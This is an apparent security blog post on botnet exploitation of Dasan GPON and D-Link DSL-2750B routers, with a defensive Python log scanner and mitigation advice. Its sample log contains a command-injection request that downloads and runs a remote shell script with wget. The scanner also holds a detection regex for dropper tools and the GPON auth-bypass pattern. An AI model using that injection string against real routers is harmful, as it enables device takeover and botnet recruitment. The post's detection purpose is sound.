Vulnerabilities are an everyday fact of IT security. A vulnerability is a weakness in software or hardware that an attacker can find and use to get into your devices. Think of your house as the system being attacked. If every door and window is locked, the house is protected; if a door is unlocked or a window is left open, the house is exposed to whoever happens to try it. A vulnerability is much the same: something overlooked or forgotten that an attacker can use to gain access and cause harm.

This brings us to the recent spike in exploit attempts against D-Link DSL-2750B and Dasan GPON routers. The Dasan GPON routers carry two vulnerabilities: CVE-2018-10561, an authentication bypass, and CVE-2018-10562, a command injection that gives the attacker remote code execution and, from there, an ongoing channel between the adversary and your network [1]. The D-Link DSL-2750B is hit by a separate command injection that is being exploited in the same campaigns [2]. These flaws have been used in several campaigns linked to the Mirai and Satori (a Mirai variant) botnets.

Most corporations do not see this as their problem because they run enterprise-grade network hardware rather than small home/office routers. But what about small business operators, companies with employees who work from home, or third-party suppliers? GPON routers are very popular and widely deployed by ISPs that offer fiber-optic internet, so these devices sit in front of a great many home offices.

This is where understanding the vulnerability and staying aware matters. If a home user's router is exploited, the attacker is sitting on the same network as any corporate laptop in that home and can use that position to attack the device and, through it, reach the company's wider network. That is especially likely when the attacker is recruiting devices into a botnet to launch future attacks. Another reason IT staff should watch for this activity, even when a given alert turns out to be a false positive, is that it shows someone probing for ways into the network. Much of it will be indiscriminate scanning, but some of it will be targeted attempts timed for when IT and security staff are unlikely to be paying attention.
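As an added example (not code from the original article or from any of the vendors or researchers it cites), the script below shows the kind of check IT staff can run over web-server or reverse-proxy logs to spot the probing described above. It flags the request patterns that the public disclosures cited in the references describe for these devices (the "?images/" authentication-bypass trick and the /GponForm/diag_Form endpoint for the GPON routers, and the login.cgi?cli= pattern for the DSL-2750B), plus a generic shell-metacharacter heuristic for command injection, and notes whether the source address is outside the RFC 1918 ranges. The log lines, the source addresses and the treatment of RFC 1918 space as "LAN" are all constructed assumptions for this example.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit, unquote

# Constructed sample log lines (combined log format) for this example only.
# Lines 1-2 mimic the GPON traffic pattern described in the public disclosure
# ("?images/" bypass against /GponForm/diag_Form); line 3 mimics the D-Link
# DSL-2750B login.cgi injection pattern from the cited exploit-db entry;
# lines 4-5 are benign LAN traffic. Addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2018:13:04:11 +0000] "GET /GponForm/diag_Form?images/ HTTP/1.1" 200 512 "-" "Hello, world"
203.0.113.7 - - [10/Jul/2018:13:04:12 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "Hello, world"
198.51.100.9 - - [10/Jul/2018:13:05:01 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.9/x.sh%20-O%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 404 0 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Jul/2018:13:06:30 +0000] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Jul/2018:13:06:31 +0000] "GET /images/logo.png HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Generic command-injection heuristic: shell separators / substitution plus the
# download-and-run tooling that botnet droppers typically use.
SHELL_RE = re.compile(r"[;|`]|\$\(|&&|\b(?:wget|tftp|curl|busybox)\b|/tmp/")

# Assumption for this example: anything in RFC 1918 space is the LAN side.
LAN_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_lan(ip):
    """True when the address falls inside one of the RFC 1918 ranges."""
    addr = ip_address(ip)
    return any(addr in net for net in LAN_NETS)


def classify(method, target):
    """Return the list of indicator names that match one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = unquote(parts.query)
    reasons = []
    if "images/" in query:                          # "?images/" auth-bypass trick
        reasons.append("gpon-auth-bypass")
    if path.lower() == "/gponform/diag_form":       # endpoint abused for the injection
        reasons.append("gpon-diag-endpoint")
    if path.lower() == "/login.cgi" and query.startswith("cli="):  # DSL-2750B pattern
        reasons.append("dlink-login-cgi")
    if SHELL_RE.search(query):                      # generic injection heuristic
        reasons.append("cmd-injection")
    return reasons


def scan_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["method"], m["target"])
        if not reasons:
            continue
        findings.append({
            "ip": m["ip"],
            "external": not is_lan(m["ip"]),
            "method": m["method"],
            "target": m["target"],
            "status": int(m["status"]),
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        where = "INTERNET" if f["external"] else "LAN"
        print(f'{f["ip"]:<15} {where:<8} {f["method"]} {f["target"]} -> {", ".join(f["reasons"])}')
```

A hit on the admin interface from a non-LAN address is itself worth a ticket even when the request fails, since a 404 or 401 from an attempt like line 3 tells you remote management is reachable from the internet at all, which is exactly the exposure the recommendations below are meant to remove.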

On vulnerable routers it is recommended to disable remote (WAN-side) administration, disable Universal Plug and Play, change any default login credentials, and apply vendor firmware updates where they are available. Where the router is supplied and managed by the ISP and those settings cannot be changed, contact the ISP and ask them to block the attack traffic or replace the device.


References:

[1] Dasan routers running ZIND-GPON-25xx firmware and some H650 series GPON routers are affected by CVE-2018-10561 and CVE-2018-10562: https://www.vpnmentor.com/tools/gpon-router-antidote-patch/

[2] D-Link DSL-2750B routers with firmware 1.01 to 1.03 are affected by the separate command injection seen in the same campaigns: https://www.exploit-db.com/exploits/44760/

[3] https://www.esentire.com/news-and-events/security-advisories/increase-in-attacks-on-gpon-routers/

[4] https://www.enterprisetimes.co.uk/2018/07/24/dasan-and-d-link-routers-face-new-attack/

[5] https://www.scmagazineuk.com/dasan-d-link-routers-targeted-apparent-botnet-new-wave-exploit-attacks/article/1488662